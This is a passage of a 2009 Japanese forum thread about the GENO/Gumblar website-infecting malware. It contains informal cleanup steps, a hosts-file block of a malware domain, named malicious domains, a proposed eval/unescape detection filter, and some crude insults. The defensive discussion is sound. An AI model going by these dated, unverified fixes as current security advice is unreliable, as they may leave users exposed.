09/05/26 13:43:09 IhQBcdl+0
>>189
avast!だが別におかしくならないぞ?
195:192.168.0.774
09/05/26 14:02:41 bEUyE4rkP
>>179
俺はavast使い始めた時にちょっとおかしくなった
具体的には明らかに>>200までしか進んでないのに、>>800宛のレスが当然のように(しかも複数)使われてたり。
まぁスレにウィルスのコードか何かが張られてて、それを察知したavastたんがスレの大部分を隔離してただけだったんだが。
196:192.168.0.774
09/05/26 14:05:44 g4Ut+ZKA0
datぶっ壊れたらそうなるよ
197:191
09/05/26 14:35:00 ZHtkN1G7O
>>192
ありがとうございます!
今確認してみたら、そのファイルも50,727バイトだったし、レジストリエディタも立ち上がった…
よかった!
ただ、IEが妙に終了したりするようになったのが気になるな…
198:192.168.0.774
09/05/26 15:27:40 76kSxz87P
最近「IPアドレス取得中」と表示されます
環境は,XPSP3 YBB12Mで無線LAN接続しています
ここ最近、起動時にネットには接続できるのですが
アイコンが「IPアドレス取得中」の状態なんです
修復すると正常のアイコンに戻ります。
このウィルスに感染したんでしょうかね?
199:192.168.0.774
09/05/26 15:32:25 3uBHEXNZO
>>198
>>1
200:192.168.0.774
09/05/26 15:32:58 /ktv3JuM0
>>183
クリーンインスコか…最終手段はそうしてみる
avastは入れてないんだけどなんか開けないスレがいくつかあるんだよな
とりあえずdatを消してみてまた取得しなおしてみる
201:192.168.0.774
09/05/26 15:33:05 Z2FeIoNLP
なんでもかんでもGENOのせいw
202:192.168.0.774
09/05/26 15:36:26 76kSxz87P
>199
>1は読んで対応済みです
203:192.168.0.774
09/05/26 15:38:45 whX8t5/V0
>>198
>>183
204:192.168.0.774
09/05/26 15:49:07 l/mq9I5TP
>>198
・・・さすがに酷い、わざわざ質問する前にテンプレみて確認しろよ
つーか、GENOかどうか疑う前に IPアドレス取得中 でggrks
205:192.168.0.774
09/05/26 16:32:20 AzhiVy6U0
>>197
Genoではないものの他のウイルスに感染している
可能性もあるのでニフティなどでスキャンをしてみてください
206:192.168.0.774
09/05/26 16:56:24 3uBHEXNZO
>>202
1は読んだんですね、すみません
それならもうネットに繋がない方がいいですよ
207:192.168.0.774
09/05/26 17:05:14 xUEn5PcS0
つかこれ釣りじゃね?
208:192.168.0.774
09/05/26 18:35:15 R/KlVnzg0
>>198
お前の環境が悪いだけ。有線で繋いどけ。
209:192.168.0.774
09/05/26 20:16:30 jrdNXPLC0
前スレ?かな、次はQuickTimeとか狙われるかも
みたいなレスがあったと思ったけど
こんなことになったぜ・・・
URLリンク(www.forest.impress.co.jp)
210:192.168.0.774
09/05/26 21:50:53 MO01MAyz0
このネタ既出?w
URLリンク(www.geocities)。jp/bjpinoko20/hgkouza.htm
gumbler へのリンクが埋め込まれているはずですが…。
> /./g
211:192.168.0.774
09/05/26 22:15:34 2djNJEe50
firefoxだとsafebrowsingに怒られちゃうな
212:192.168.0.774
09/05/26 22:51:29 q+URMcwD0
GenoVirus感染サイトリストのコメントのURLがリンクになってるんだけどいつからだろ?
これ間違って踏む人出そうで危ないような気がするんだが…。
213:192.168.0.774
09/05/26 22:54:43 zO7o4gpQ0
間違って踏む人なんかいるか?
それより、駆除できてるのに、いつまでもリストアップされてるサイトが気の毒。
214:192.168.0.774
09/05/26 23:53:25 7dDKXeJO0
駆除しても告知しなきゃ意味ないだろ
気の毒も何もあったもんじゃない
これじゃ元々感染してないのか駆除済みなのかわからん
215:192.168.0.774
09/05/27 00:22:48 Q9qE4kHO0
それはうp主に言ってるの?
感染サイトに言ってるの?
216:192.168.0.774
09/05/27 00:26:07 Zw9diHMU0
サイトとかページに対して「感染」とか「駆除」とか言うと
あたかもウイルスの実体がサイト自体、ページ自体にあるかのように
誤解する人が出る
217:192.168.0.774
09/05/27 00:44:02 DS7RW+Eb0
感染サイト、今リロッたらたらリンクなしになってた
ところでpass入れても記事削除できないんだが自分だけか?
同じ記事を2重に書いてしまい、ひとつは消せたから、pass間違いはないはず。
同じ不具合?があるなら、
上げた人が誤報告や対策済みと確認したところで、修正できないわけだが…
218:192.168.0.774
09/05/27 00:45:32 Q9qE4kHO0
あー、それはあるかもな。
厳密には「管理者のPCがトロイの木馬型ウイルスに感染したために不正に改竄されたサイトリスト」・・・・・・て長いよっ。
219:192.168.0.774
09/05/27 00:56:26 SmAh1nJS0
なんか次はQuickTimeの脆弱性が突かれそうだな。
毎度のごとくパッチが用意される前にアドバイザリが公開され、
ゼロデイ状態になってるから、Adobeよりも狙い目なんじゃ
ないか?
220:192.168.0.774
09/05/27 02:57:28 NCsP4Es70
>>216
ってか途中までそう思ってた。
そしてQuickTime入れてない俺は勝ち組。
221:192.168.0.774
09/05/27 05:42:48 aSvBKq6i0
うっしゃ自分もいれてない。
あれ、ことあるごとにインスコされようとするからウザいんだよなぁ
222:192.168.0.774
09/05/27 10:38:07 mqE4guJk0
XSS対策されてないblogとかのwebサービスは、
投稿者がスクリプト投稿したら閲覧者が感染するよ
今はmartuz止まってるみたいだから、martuz以外から実体拾うようにしないと無理だけど。
223:sage
09/05/27 11:07:25 +948GCw/0
>>148、すみません。全然、理解していませんでした。こうでしょうか?
Firefox用プラグイン Shockwave Flash――――Flash Player
Shockwave for Director――-Shockwave Player
IE用 ActiveX Shockwave Flash Object――-Flash Player
Shockwave ActiveX Control―Shockwave Player
でも、自分は、まだFlashとShockwaveの違いも よく分かってませんが、
ほんと難しいなと思いました。
Macromedia社やDirectorなどの成り立ちから、通常 呼び分けていた流れと、
機能面からか、それぞれ製作側、閲覧側のツールとして捉える向きと
Web上に混在していて、時系列を把握していないと、一概には咀嚼できないんですね。
この認識も、ものすごく浅いところでは、という注釈つきでもダメかもしれませんし……。
とにかく自分は Flashの歴史について無知すぎた。
アドオン、プラグイン、ActiveXコントロールなどの
拡張パックの語彙・用法に関してもAboutすぎました。
224:192.168.0.774
09/05/27 11:15:10 H/k8FWrU0
>>219
QuickTimeに限らず、昔からApple製のソフトは極め付けに行儀が悪く、
汚れた手で全身を撫で回されるような気持ち悪さがあるから常識のある奴は使わない。
感染するのはiPhoneやiPodみたいなアイテムを使ってる変態共だけだろ。
225:192.168.0.774
09/05/27 11:41:56 cNx9FNpE0
>>223
日本語でおk
226:192.168.0.774
09/05/27 11:42:07 Lh6wq4Ey0
確かに入れてるだけでしぶとくしつこくスタートアップに居座ろうとするQuickTimeは、難儀な存在だな。
iTunesとがんじがらめにしてるところもあざとい。
227:192.168.0.774
09/05/27 11:54:47 5HmcqpnuP
iTunesとかQuickTimeはMACで使うもの。Windowosには入れてない。
228:192.168.0.774
09/05/27 11:59:32 zItNA/Lv0
amazon危険度92%って微妙すぎて怖い
229:192.168.0.774
09/05/27 12:02:47 dxmZredg0
携帯用に変換するためだけに入れてるけど、そんなに行儀悪いのか?
年に数回しかつかわないし、iPodは持ってない・・・
230:192.168.0.774
09/05/27 12:11:01 KFsQLuii0
俺はゆるいあぽー信者だが、環境維持という観点では、
耐えられないって意見が出てくるのもしゃーない挙動はちょくちょくあるね
最近では、勝手にSafariダウソとか 信者から見てもありゃやりすぎだw
例によって、砂箱にほうり込んでおけばおk
231:192.168.0.774
09/05/27 12:32:52 tYvKSspx0
>>229
俺も変換君のためだけに入れてる
232:192.168.0.774
09/05/27 12:52:51 0KD43PY10
>>224
常識のある奴って・・・www
ああ、そうか、常識のある奴は>>224のような書き込みをするのか・・・
233:192.168.0.774
09/05/27 13:29:48 aSvBKq6i0
これ思い出した。
iTunesが おきあがり
なかまに なりたそうに こちらをみている!
なまかに してあげますか?
>はい
iTunesが なかまに くわわった!
QuickTimeが なかまに くわわった!
Bonjour for Windowsが なかまに くわわった!
234:192.168.0.774
09/05/27 13:36:09 6IjdJuck0
>>229
そういやQuicktimeってFirefoxを勝手に設定書き換えたり
プラグイン突っ込んだり一部ファイルの処理横取りしたりでレイプし放題だったな
235:192.168.0.774
09/05/27 13:48:08 H/k8FWrU0
Apple製品を使うってことはApple様に向かって股を開いて
「私はApple様の従順な奴隷ですから思う存分ファックしてください」と宣言するようなもの
そんな連中はウイルスに感染しても別に普段と変わらないと思うよ
ファックするのがApple様じゃなくて得体の知れないウイルスに代わるだけだしな
俺たちはそんな連中に近寄りたくないだけで
236:192.168.0.774
09/05/27 14:15:12 p3rI2ovh0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
まだ↑これが最新だよね?
237:192.168.0.774
09/05/27 14:21:44 pn6iaSeA0
ここはいつからアポースレになった?
238:192.168.0.774
09/05/27 14:52:04 n6+UUmaxP
QuickTimeなんてイラネだろ
239:192.168.0.774
09/05/27 14:56:15 dxmZredg0
いらないんだけど変換君便利なんだよな・・・
240:192.168.0.774
09/05/27 14:58:23 DMxSQASUO
林檎信者も林檎アンチもゴミ、つまり>>235もゴミ
241:192.168.0.774
09/05/27 15:06:57 7U85I7ws0
何を使おうが、
適切に選んでるか、使いこなしてるか、管理できてるか、
が問題であってだな・・・
面倒な上、馬鹿馬鹿しいので止めた
242:192.168.0.774
09/05/27 15:17:28 KFsQLuii0
スレ的には、Flash/Acrobatの穴がだいぶふさがったら、
いずれ順番で、QTの脆弱性も突かれるのかもな
ただ、Flash/Acrobatと違って、業務機よりホーム機に入ってる方が多そうだから、
攻撃者にとって「おいしい」かどうかは、攻撃者のターゲット範囲によってくるか
243:192.168.0.774
09/05/27 15:17:32 0KD43PY10
変な奴に触ってしまったえんがちょえんがちょ
244:192.168.0.774
09/05/27 18:53:55 LtJky3Fi0
QuickTimeは勝手に自分を標準プレイヤーにしたり
ブラウザ上で開くだけでスタートアップに登録したりと困りもの
で、QuickTimeの挙動がウザイ、でも変換君は使いたい
って人はQuickTime Alternativeがおすすめ
ただ変換君が使えるバージョンが入手かわからんが
245:192.168.0.774
09/05/27 19:11:14 LoTgBZbR0
>>244
自分もそれ使ってる。
RealもQuickもこれで間に合うからな。
プレイヤーはいらないし。
246:192.168.0.774
09/05/27 19:53:39 7RRpVkld0
GENOウィルス・質問掲示板
URLリンク(www1.atchs.jp)
ここの680が書いてる555のタグ情報って既出?
247:192.168.0.774
09/05/27 20:09:22 cL+kp0Pk0
>>233
あるあるすぎて困る
248:192.168.0.774
09/05/28 00:46:33 6Q6FXXKz0
しかしすっかり落ち着いた流れになったけど
皆どうしてるんだろう
249:192.168.0.774
09/05/28 00:49:47 UQFqDqzO0
応急対策はできても、恒久対策ができてないからね
ウイルスが活発化しなければ、このままフィードアウト何じゃないかな・・・
250:192.168.0.774
09/05/28 00:56:36 XYDCILBX0
フィ…フィードアウト…
251:192.168.0.774
09/05/28 00:57:59 0cYThVoc0
なにそれこわい
252:192.168.0.774
09/05/28 01:00:25 UQFqDqzO0
未だに対応(駆除、消去)のソフト聞かないし・・・
遅いよね・・・
253:192.168.0.774
09/05/28 01:06:17 ysEgixzlP
システムに不可逆な改変を加えるマルウェアに感染したら安全が確認されている
バックアップから書き戻すかOSの再インストールするしかない
254:192.168.0.774
09/05/28 01:30:38 mVG3+O460
自分の興味はウイルスから不正改竄に移った。
zone-hとかizumino.jpを見て、日々こんなにハッキングが行われているのかと。
GENOでなくても、これじゃいつどこに新種のウイルスが仕込まれてもおかしくない罠。
255:192.168.0.774
09/05/28 04:20:23 lNaKdK5O0
海外の方だと、インターネットの経路上にパケットキャプチャが仕掛けられていることすらあるしな。
そこを流れた平文パスワード(pop3とかftpとかtelnetとか)はダダ漏れ
辞書によるID/PASS総当りも常套手段だし、最近は日本人の名前やアニメ・ゲームのキャラクタまで入ってる。
安易なID/PASS設定しておくと、いつのまにかログインされて使われているオチ
「誰かが守ってくれる」なんて思っていたらインターネットでは生き残れない。
256:192.168.0.774
09/05/28 05:46:40 eSuKYW+W0
楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2
スレリンク(news板)
257:192.168.0.774
09/05/28 08:08:54 7x2zaD760
>>256
GENOと関係なし。
258:192.168.0.774
09/05/28 09:55:39 j5JE7+Uz0
>>255
2chだと自演するためだけに適当な串さしてる奴も危機感がないと思う
何されてるのか分からんのに
259:192.168.0.774
09/05/28 12:14:11 Mzk/ssdW0
わけのわからない串は、わけのわからないモノを取りに行くのにけっこう助かったり
マルウェア差し上げます。おひとりさま(1IP) 1日1回まで。みたいなとこ
martuzもそんなんじゃなかったっけか
ま、POSTにはつかわん 秘匿性は期待しとらん
260:192.168.0.774
09/05/28 16:31:51 bhK+RmSY0
新マルウエア「GENOウイルス」蔓延に注意
URLリンク(www.asahi.com)
ASAHIでも記事になったようだ。GENOは無料で広告できていいねぇwww
261:192.168.0.774
09/05/28 16:53:51 OoqSOCZLP
fc2やっと注意喚起のメール来たよ
262:192.168.0.774
09/05/28 17:35:08 Mzk/ssdW0
月曜にきてたか [feed] URLリンク(blog.fc2.com)
旧パスワード一斉無効措置付きか なるほどなー
263:192.168.0.774
09/05/28 17:39:28 GHs75aeF0
>>261
うちには5/21に来てる
分散して送るから,長いときは1ヶ月くらいかけてるね
複数アカウント持ってるとわかるw
264:192.168.0.774
09/05/28 17:59:56 Q+qjDG1G0
>>260
愛用していたアプリケーションが非対応だったから倦厭していたが、
Vistaってそんな機能があったんだな。
265:192.168.0.774
09/05/28 18:28:38 pUjLwD3e0
UACがなんなのかわからないやつがいてびっくり
今回はGENOどうこうより
初心者レベルの内容も熟知してないことが脅威だったわ
266:192.168.0.774
09/05/28 18:56:31 gkgYHsms0
誰も彼もがビスタ使ってるわけじゃないんだから
267:192.168.0.774
09/05/28 20:32:46 g4U0zyYz0
確かに>>264を見る限り>>264はVista使ってないよな
UACがなんなのかわからなくても全く問題ないw
268:192.168.0.774
09/05/28 20:35:08 wffocc+90
いや嫌々ながら使ってると取れる
269:192.168.0.774
09/05/28 21:06:24 TxXedgLr0
倦厭じゃなくて敬遠じゃないの?っていう突っ込みはナシ?w
270:192.168.0.774
09/05/28 21:17:34 wD+USA9K0
>>260
この記事の中に
>一部に「GENOウイルスには、セキュリティー対策ソフトが役に立たない」といううわさも
>流れていますが、それは間違いです。
って書いてあるんだけど…
271:192.168.0.774
09/05/28 21:20:43 7jbhXxMV0
亜種には対応していない
とも書いてあるけどな。一番はやったときに検体が提出されたものにはさすがに対応してるんじゃね?
試す気はないが。
272:192.168.0.774
09/05/28 22:08:31 qnsFnw2TO
cmdでのサイズチェックは問題なし、regeditも動作確認した
でもインターネットがくそ重い、ブラウザ変えても改善しない、DL速度が10KB/secも出なくなった
これは感染したと見ていいのかな…
273:192.168.0.774
09/05/28 22:15:46 wffocc+90
>>272
何でそうなるんだ
合理的な思考しろよ
274:192.168.0.774
09/05/28 22:24:27 Oax7cXyu0
使ってるセキュリティソフトが2chのどこに行ってもJS Downloador検出してまじでびびった
アップデートしたら直ったけどまじで心臓に悪い
275:192.168.0.774
09/05/29 01:10:03 piBcLweA0
自分は今日、ネットは普通に使ってるのに
Flashが何かわかってない人に出会った
Flashってなに?ってきかれて、まずどう返していいのか一瞬困ったw
知らなくても問題なく使えてしまうからだろうけど
276:192.168.0.774
09/05/29 01:57:00 vEUQiBSK0
Flashぐらいでびびるなよ
ファイアウォール知らないやつとかざらにいるぞ
277:192.168.0.774
09/05/29 02:37:36 OlQbOmgA0
Flash知らないくらいなら普通にいるよ
そんくらいなら動画サイト見てるなら入ってるよで通じるし
いちいち言うほどのことじゃない
つーかそれをバカにしちゃうほうがアレだわ
278:192.168.0.774
09/05/29 03:11:05 ehBR5T6V0
今は、ADSL 12MB が、約2千円、プロバイダのメール無しで約1.5千円なのに、
Yahoo! BB が値下げしない悪徳業者だと気づかないで契約時のまま 4千円近く
払わされている無自覚の感染者が何百万人もいるほうが驚くな
年間2万4千円多く徴収されているのに気づかない人たちを救ってやってったら、
景気回復するんじゃないのw
468 名前: 非通知さん 投稿日: 2009/05/17(日) 14:20:19 ID:3bcz0igI0
【ソフトバンク】
ソフトバンクBB㈱の総合ブロードバンドサービス「Yahoo! BB ADSL」における、当期末の累積接続回
線数は429 万9,000 回線、当第4四半期のユーザー支払いベースのARPU は4,262 円となりました。
279:192.168.0.774
09/05/29 08:45:40 JsHSZpr50
パソコンには詳しくないからよくわからないけど怖いですね~
…って書いてるサイト運営者が一番嫌だ。
280:192.168.0.774
09/05/29 08:47:11 x3Y9c4A10
これのメール版があるんだね
(((((((( ;゚Д゚)))))))ガクガクブルブル
281:192.168.0.774
09/05/29 10:04:49 4z/zw8YJ0
プリインストールで入れてるなら、更新についても責任持ってもらいたいもんだな
282:192.168.0.774
09/05/29 10:55:56 uOCaNFIZ0
スレリンク(doujin板:806-番)
同人板のほうにアレな情報が
283:192.168.0.774
09/05/29 11:26:57 BthGL6et0
>上司から、お前の存在自体がセキュリティホールだ!と言われようとも
ぐのーむさんこんなこと言われてるのか・・・
あの活動が何のために行われてるのか上司は考えたことがあるのか
284:192.168.0.774
09/05/29 11:31:03 lYJ/D9vX0
>>282
別に不思議でもないんでもないっしょ。
285:192.168.0.774
09/05/29 17:06:05 foH44K5U0
体験者に一度きいてみたいんだが、感染サイトを踏んだらまず何がおきるんだ
adobe関係のウィンドウが開いたりするわけ?
286:192.168.0.774
09/05/29 18:01:38 3HxQrXqXP
割れ目がじゅわっ~となる
287:192.168.0.774
09/05/29 19:08:55 VI53AlJ90
>>258の言うように、わけの分からない串を使うのは危険なのだろうが、
巻き添え規制をくらっているため、仕方なく串を使った。
IDの出ないセキュ板のスレへの書き込みなので、自演のためではないが。
288:192.168.0.774
09/05/29 19:30:11 unRBn1g50
2chにかける串ってどこで探してる?
289:192.168.0.774
09/05/29 19:47:31 btAPZUmJ0
>>285
様々だからわからん(環境次第)
290:192.168.0.774
09/05/29 20:19:51 /RoVQptw0
はじめはリストで弾くようにしていたけれども、リストを更新するのが面倒になったので、
unscapeなんて文字コードをテーマにしたサイト以外は碌な目的で使わないよねと思って、
evalとunscapeを含むコードがあったら、とりあえずコメントアウトして、アラートを出すProxomitronのフィルタを書いたのだけれども、需要あるかな。
へっぽこだから、ブログでこっそり公開しようかとも思ったのだけれども、需要があるようなら投下します。
291:192.168.0.774
09/05/29 20:24:16 KFlNWkjO0
ヒント:Google Analytics
292:192.168.0.774
09/05/29 20:46:38 OlQbOmgA0
>>287
つ ●
つ p2
293:192.168.0.774
09/05/29 23:13:11 zmeqzjSv0
大丈夫かよ横浜市役所・・・
URLリンク(www.google.com)
294:192.168.0.774
09/05/29 23:28:16 Si5aZKJwP
おいおい
【XP厨死亡】DirectXに脆弱性
スレリンク(news板)
295:192.168.0.774
09/05/30 00:31:39 e8IE9Rq3P
すっかり過疎ったな
296:192.168.0.774
09/05/30 00:50:24 2UGL94hdO
GENOに感染したまま、気付かずに1ヶ月ほどPC利用していました。
HP等は開設しついません。
個人情報が漏れるそうですが、ネットショッピングの際のログインパスワード等は大丈夫なのでしょうか?
297:192.168.0.774
09/05/30 01:08:14 NJoQk9Ql0
抜かれる可能性があると言われてたけどまだ報告はなかったような
心配だったら履歴を確認してパス変更でいんじゃね?インスコ済の話ね
298:192.168.0.774
09/05/30 01:30:00 ja4TbjLv0
前に、クローズアップ現代でボットの話題をやった回の動画ないですか?
299:192.168.0.774
09/05/30 01:32:59 i+8LuJWk0
>>298
うっせえハゲ。
300:192.168.0.774
09/05/30 01:34:43 2UGL94hdO
>>297
レスありがとうございます。
契約者名で大量のスパムが来ていたから変だとは思っていたんです。
現在は隔離済みです。
パスは一応変更しておきます。
1日10分ほどしか立ち上げないPCだったため、スケジュールスキャンをオフにしていましたorz
301:192.168.0.774
09/05/30 01:45:18 Xadobnvw0
なるべくならOSいれなおしたほうがいいけどお好みで
そのあとにオンラインサービス各種のパスワード変更
フリーメールのパスワードも変えてね
302:192.168.0.774
09/05/30 02:09:41 ja4TbjLv0
>>298
自己レス。見つかった。
GENOがボット目的かどうかはわからんが、
嫌儲はアフィチェッカーよりボットを憎むべきじゃないだろか?
303:192.168.0.774
09/05/30 06:37:58 gEls4z/j0
だいたいアフィチェッカーよりもatwikiがどんだけ儲けてると思ってるんだよ糞
yahooとか使うなよハゲ
論理的思考ができない嫌儲はBOTに感染して苦しむべき
304:192.168.0.774
09/05/30 09:10:48 tVJG0Fy00
なんかもうGENO関係なくね
305:192.168.0.774
09/05/30 09:14:25 K6dO28la0
沈静化したということで喜ぼう。
306:192.168.0.774
09/05/30 09:28:15 P85iemiB0
QT周りの脆弱性狙いでまもなく再開するよ。
307:192.168.0.774
09/05/30 09:42:07 cGiKVc7U0
パソコンの中のQTを検索してみたら、adobeの中にあったんだけど、大丈夫なんでしょうか?
もちろん最新バージョンにしています。
308:192.168.0.774
09/05/30 10:03:58 qdysrUs00
QTってゼロデイ状態じゃなかったっけ?
なんか、DirectXまで出てきたし、やり方確立したら騒ぎになるかもね
309:192.168.0.774
09/05/30 10:22:10 P85iemiB0
>>307
Acrobat 3D用のプラグインでしょ。
存在すること自体は問題ない。
>>308
そう。Apple製品で脆弱性が見つかると、ほとんどいつもゼロデイ状態になる。
310:192.168.0.774
09/05/30 13:34:46 xI0fhZRq0
メモ
URLリンク(www3.atword.jp)
311:192.168.0.774
09/05/30 14:40:48 u7Zs/D5w0
purser: 旅客係(一般人の意味のパーサー。<=>IT用語のパーサ)
ぐのむたんしっかり汁w
なんにせ、マルチメディア系のもんは何だって信用ならん
…みんなまるごと砂箱逝き。
312:192.168.0.774
09/05/30 15:26:29 vgPL/By80
URLリンク(headlines.yahoo.co.jp)
>同省岐阜国道事務所の道路状況を伝えるサイトも改ざんされ、
>閲覧者のパソコンがコンピューターウイルスに感染する状態になっていた。
>改ざんは同7日から行われていたとみられ、
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。
これもしかしてGENOか?
313:192.168.0.774
09/05/30 15:30:56 K6dO28la0
国交省のかな?そんな報告あったはず。
314:192.168.0.774
09/05/30 16:26:14 +gwIZfhs0
>>312
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。
ひどい話だな。GENOだろ
315:192.168.0.774
09/05/30 16:53:10 ClpJp3oP0
だいたい半数がXP/2000ユーザーだとすると、それでも3500件か…。
316:192.168.0.774
09/05/30 19:01:05 ZoOVnb3tO
色々デカイサイトが感染してると
俺のサイトで感染したのが誤魔化せるからありがてー
317:192.168.0.774
09/05/30 19:39:19 3MWi+wus0
新しいPCかOS買えウィルス?
318:192.168.0.774
09/05/30 20:39:53 u7Zs/D5w0
買ったら負けかなと思ってる奴は、意地で買わんから、ま、そんなにそうはならんだろ
319:192.168.0.774
09/05/30 22:28:33 J5jeyF8C0
QuickTimeってadobe製品なんですか?
320:192.168.0.774
09/05/30 22:42:02 rUA0di420
GoogleはAdobe製品じゃないですよ
321:192.168.0.774
09/05/31 02:43:28 +yn1Qi0T0
GENOウイルスチェッカーのサイトいったら
フラッシュでIE用の更新が来てたが
adobeのサイトからはどうやっていくんだ?
チェッカーのURLはexe直なので、なんかいや。
322:192.168.0.774
09/05/31 02:54:04 Ncu0YETE0
>>321
調子こいてんじゃねえよ、クズが
323:192.168.0.774
09/05/31 03:05:14 nxL2UMVc0
ブログのコメント欄や、wikiに大量に投下されるスパムは
GENOと関係ありますか?
324:192.168.0.774
09/05/31 03:21:53 L/RlP11XP
いいえ
325:192.168.0.774
09/05/31 12:36:21 f92421kK0
>>321
Flash Playerの更新なんて来ていないよ。
あれはページ内の記述に訂正更新があっただけ。
紛らわしい書き方なんで、あなたと同じく勘違いした奴が多数。
326:192.168.0.774
09/05/31 14:56:31 qnzGlpd70
PCに詳しいこちらの住人の皆様に聞きたいのですが…
GENOも大分落ち着いた…ということを聞き、久しぶりに趣味の
サイト巡りをしていたところ、私のPCのセキュリティが何らかの
ウィルスに反応し、削除(?)を行いました。
念のため、【まとめ】にあるやり方を見ながら再度ウィルスチェック
をしたところ、幸いなことに私のパソコン(Vista)は感染を免れて
いました。
こういった場合、サイトはウィルスに侵されていると考えてもよいので
しょうか?表ページには週2回の自動ウィルスチェックが入っていると
なっていましたが…。
もしウィルスに侵されているのならば、ほかの人がウィルスに侵される
危険があります。なので、管理人さんにウィルスに侵されているのでは?
とメールを送りたいのですが、今度閲覧してウィルスに侵されたら…と
思うと、恐ろしくてもう一度そのサイトを開く気になれないのです。
こういった場合、何らかの伝達手段はありますでしょうか?
327:192.168.0.774
09/05/31 15:02:15 YRT85t+60
>>326
携帯で開いて知らせれば?PCビューアーとか今はついてるでしょ
328:192.168.0.774
09/05/31 15:10:08 Ncu0YETE0
>>326
パソコン持って逃げろ
329:192.168.0.774
09/05/31 15:10:43 qnzGlpd70
>>327
ありがとうございます。
携帯は国外在住のため、所持していないのです。
もう、他の方がお知らせしてくださるのを待つしか手はないですよね。
330:192.168.0.774
09/05/31 15:43:20 yExQo+6e0
>>329
URLをここに晒せばいいじゃん。
331:192.168.0.774
09/05/31 16:41:46 9R9WK3IZ0
感染しました。
URLリンク(geno.2ch.tc)
の「GENOウイルス感染からの復帰方法」を途中までやってわからなくなってしまいました。
* C:\WINDOWS\Prefetch 内を全部削除
* [Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
* スタートアップに何も書かれていない行があったのでチェックをOFF
* regeditを起動して(起動できない場合は command を実行してその中から regedit を実行)
* \\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの一番上が (規定) REG_SZ (値の設定無し) になっていることを確認 再起動
* C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
* 正常なsqlsodbc.chmに差し替え
コマンドプロンプトでreceditを起動し
「~の一番上が (規定) REG_SZ (値の設定無し) になっていることを確認」
する方法を教えていただけないでしょうか。
332:192.168.0.774
09/05/31 16:47:45 +8joFj3w0
>>331
リカバリしろカス
333:192.168.0.774
09/05/31 16:55:57 pWZzGSp1P
c:\>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
334:192.168.0.774
09/05/31 18:51:04 c3DaDWZu0
あのサイト見るな
不十分サイト
1修正案
■ adobe readerを最新版にアップデートする
URLリンク(get.adobe.com)
とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
URLリンク(www.adobe.com)
以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
335:192.168.0.774
09/05/31 20:05:10 Cyam+zfo0
Firefoxも基本機能の設定でスクリプトを無効にできる。
Noscriptほか拡張は、それ以上を求める人向け。
336:192.168.0.774
09/05/31 20:18:52 nC9VmBzmO
前まではNosc使って許可するしないで迷ってたけど
根本から切っちゃったらラクになれたわ
337:192.168.0.774
09/05/31 20:28:11 ptHEwX4Z0
>>334
粘着死ねうざい
338:192.168.0.774
09/05/31 20:34:33 ez9DL56A0
SINEとかいうんだ
勝手にテンプレ変えてヒッシだな
339:192.168.0.774
09/05/31 22:03:41 VISqyoYW0
>>334
不十分でもあなたよりはそのサイト役に立ってますよ、きっと
セキュ板の話題をここにもちこまないでください
340:192.168.0.774
09/05/31 22:10:59 wzRIkfFE0
役にたたねえよ
341:192.168.0.774
09/05/31 22:20:47 wzRIkfFE0
まーテンプレは直さな
セキュ板の話題だ言っても
引用先はそれでかしらんが修正したんだからな
脈絡無くリンク入ってるし
342:192.168.0.774
09/06/01 01:23:58 R+p/tPKN0
>>339
管理人乙です。
343:192.168.0.774
09/06/01 16:50:37 gRaxrwT0P
新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
URLリンク(itpro.nikkeibp.co.jp)
344:192.168.0.774
09/06/01 17:20:49 RXEaw0Ub0
>>343
やっぱり似たようなのが出てきちゃったな。
このタイミングで出てきたってことはQTの脆弱性も使われてそうだ。
345:192.168.0.774
09/06/01 18:22:36 o7C9L8Ls0
>>343
対応してる4社ってどこ?
き弱性なんてかなり前からわかってたのに何やってんの?
346:192.168.0.774
09/06/01 18:26:43 r9BK4C1O0
き弱性・・・?
347:192.168.0.774
09/06/01 18:37:50 vHlvNban0
もろよわせいだろjk
348:192.168.0.774
09/06/01 18:44:12 sEf/HHkG0
マジか?
こんどは何の脆弱性使用してるんだ?
収束したと思って、普通にサイト見始めちゃってたよ。
349:192.168.0.774
09/06/01 18:47:57 W/jhCmDA0
つかってる脆弱性そのものは同じじゃないのかな
350:192.168.0.774
09/06/01 18:53:12 sEf/HHkG0
リンク先見ると、virustotal へのリンクあるね。
対応してる4社の名前も確認できるかも。
しかし、トレンドマイクロが対応してるとは…
DrWebも対応してるみたいだし、CureItで検索かけてみるかな…
351:192.168.0.774
09/06/01 19:04:20 B9YOsgHE0 BE:1789209869-2BP(0)
偽GAってのは、 googleanalytlcs.net らしい
一応すでにぐぐるSB入りしてるけど、ぐぐるSB非対応のブラウザは注意が必要
352:192.168.0.774
09/06/01 19:20:34 G/58Ch8R0
何だよ再燃かよ。これからどんどん出てくるかね
353:192.168.0.774
09/06/01 19:31:48 EN9NgtDC0
結局クーグルちょろめ最強か
354:192.168.0.774
09/06/01 20:57:57 qG9351lq0
ぐぐるSBってなに?
355:192.168.0.774
